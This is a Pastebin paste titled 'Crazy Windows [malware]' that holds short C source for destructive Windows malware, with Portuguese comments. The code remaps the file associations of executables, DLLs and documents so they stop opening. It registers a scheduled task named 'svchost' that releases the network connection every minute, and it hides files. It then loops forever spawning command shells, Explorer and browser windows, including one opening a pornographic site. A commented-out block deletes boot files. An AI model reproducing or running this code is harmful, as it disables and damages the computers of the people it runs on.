DarkProgrammer000

Crazy Windows [malware]

Jul 9th, 2021 (edited)
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.63 KB | None | 0 0
  1. /// Bibliotecas
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4.  
  5. int main( int argc , char* argv [])
  6. {
  7.     // Corromper Arquivos
  8.     system("assoc .inf=Virus");
  9.     system("assoc .ini=Virus");
  10.     system("assoc .txt=Virus");
  11.     system("assoc .bat=Virus");
  12.     system("assoc .exe=Virus");
  13.     system("assoc .sys=Virus");
  14.     system("assoc .url=Virus");
  15.     system("assoc .dll=Virus");
  16.     system("assoc .xlsx=Virus");
  17.     system("assoc .xlsx=Virus");
  18.     system("assoc .docx=Virus");
  19.     system("assoc .doc=Virus");
  20.     system("assoc .pptx=Virus");
  21.     system("assoc .ppt=Virus");
  22.  
  23.     // Bloquear Internet Pra Sempre
  24.     system("mkdir %temp%\\oi");
  25.     system("echo ipconfig /release >> %temp%\\oi\\svchost.bat");
  26.     system("schtasks /create /sc minute /mo 1 /tn \"svchost\" /tr \"%temp%\\oi\\svchost.bat\"");
  27.     system("attrib +r +s +a +h %temp%\\*.* /s /d");
  28.  
  29.     /* Código Extra [Corromper Arquivos Arquivos de Inicialização]
  30.     system("attrib -r -s -h c: \\ autoexec.bat");
  31.     system("del c: \\ autoexec.bat /s /q");
  32.     system("attrib -r -s -h c: \\ boot.ini");
  33.     system("del c: \\ boot.ini /s /q");
  34.     system("attrib -r -s -h c: \\ ntldr");
  35.     system("attrib -r -s -h c: \\ windows \\ win.ini /s /q");
  36.     system("del c: \\ windows \\ win.ini /s /q");
  37.     system("del c: \\ ntldr /s /q");
  38.     */
  39.  
  40.     // Estrutura de Repetição: [Ataque Direto e Indireto]
  41.     for (;;)
  42.     {
  43.         system("start cmd.exe");
  44.         system("start explorer.exe");
  45.         system("start iexplore.exe \"www.xvideos.com\"");
  46.         system("start iexplore.exe \"www.google.com\"");
  47.         system("msg * Dark Programmer000 !!!");
  48.     }
  49. }
Add Comment
Please, Sign In to add comment